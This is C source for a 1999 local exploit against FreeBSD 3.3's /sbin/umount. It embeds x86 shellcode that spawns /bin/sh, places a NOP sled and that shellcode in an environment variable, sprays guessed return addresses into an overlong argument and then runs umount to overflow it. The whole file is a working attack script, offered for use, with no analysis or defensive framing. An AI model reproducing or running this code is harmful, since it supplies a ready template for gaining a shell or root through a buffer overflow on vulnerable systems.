/*
*
* (c) 1999 babcia padlina ltd. / buffer0verfl0w security(b0f.morphed.net)  
* <babunia@FreeBSD.lublin.pl>
*
* FreeBSD 3.3 /sbin/umount exploit.
*
* NOTE: umount is NOT installed suid by default.
*
* 
*
*/

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define NOP    0x90
#define OFS    1800
#define BUFSIZE    1024
#define ADDRS    1200
#define DIR    "babcia padlina ltd."

long getesp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(argc, argv)
int argc;
char **argv;
{
  char *execshell =
  "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
  "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
  "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
  "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

  char *buf, *p;
  int noplen, i, ofs;
  long ret, *ap;

  if(!(buf = (char *)malloc(BUFSIZE+1)))
  {
    perror("malloc()");
    return -1;
  }

  if (argc > 2)
    ofs = atoi(argv[1]);
  else
    ofs = OFS;

  noplen = BUFSIZE - strlen(execshell);
  ret = getesp() + ofs;

  memset(buf, NOP, noplen);
  buf[noplen+1] = '\0';
  strcat(buf, execshell);

  setenv("EGG", buf, 1);

        if(!(buf = (char *)malloc(ADDRS+1)))      
        {
                perror("malloc()");
                return -1;
  }

  p = buf;
        ap = (unsigned long *)p;

        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;

        p = (char *)ap;
        *p = '\0';

  fprintf(stderr, "RET: 0x%x  len: %d\n\n", ret, strlen(buf));

  chdir(getenv("HOME"));
  chmod(DIR, 0755);
  rmdir(DIR);
  mkdir(DIR, 0755);
  chdir(DIR);
  chmod(".", 0);

  execl("/sbin/umount", "umount", buf, 0);

  return 0;
}